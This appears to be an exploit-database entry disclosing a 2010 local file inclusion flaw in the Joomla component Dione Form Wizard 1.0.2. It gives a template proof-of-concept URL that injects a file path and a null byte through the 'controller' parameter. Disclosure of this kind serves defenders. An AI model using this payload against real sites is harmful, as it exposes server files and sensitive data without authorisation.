header-logo
Suggest Exploit
vendor:
Dione Form Wizard
by:
Chip D3 Bi0s
8,8
CVSS
HIGH
Local File Inclusion (LFI)
98
CWE
Product Name: Dione Form Wizard
Affected Version From: 1.0.2
Affected Version To: 1.0.2
Patch Exists: NO
Related CWE: N/A
CPE: a:dionesoft:dione_form_wizard
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Joomla!
2010

Joomla Component FDione Form Wizard lfi vulnerability

A vulnerability exists in Dione Form Wizard, a Joomla! component, which allows website administrators to create web forms easily through a simple drag-and-drop editor. An attacker can exploit this vulnerability to gain access to sensitive information by sending a specially crafted HTTP request containing an LFI payload. This payload can be sent to the vulnerable application via the ‘option’ and ‘controller’ parameters in the URL.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in the application.
Source

Exploit-DB raw data:

-----------------------------------------------------------------------------------------
Joomla Component FDione Form Wizard lfi vulnerability
-----------------------------------------------------------------------------------------

Author		: Chip D3 Bi0s
Email		: chipdebios[alt+64]gmail.com
Date		: 2010-05-13
Impact		: Exposure of sensitive information
Where		: From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application   	: Dione Form Wizard
version       	: 1.0.2
Developer     	: Dione Soft Company
License       	: GPL            type  : Commercial
price		: $20
Date Added    	: 9 may 2010
Download      	: http://dionesoft.com/products/dione_form_wizard/product.html

Description   	:

Dione Form Wizard is Joomla! component allows website administrator to create web forms easily through simple drag-and-drop editor.

This product gives you the power to create forms that run inside Joomla without requiring knowledge of HTML, MySQL and PHP.

The main idea of the Dione Form Wizard is to give a tool that is enabling you to create a dynamic forms in minutes within your Joomla! CMS.
---------------------------------------------------------------------------

Poc/Exploit:
~~~~~~~~~

http://127.0.0.1/[path]/index.php?option=com_dioneformwizard&controller=[LFI]%00



+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++

Navigation

Suggest Exploit

Services By CQR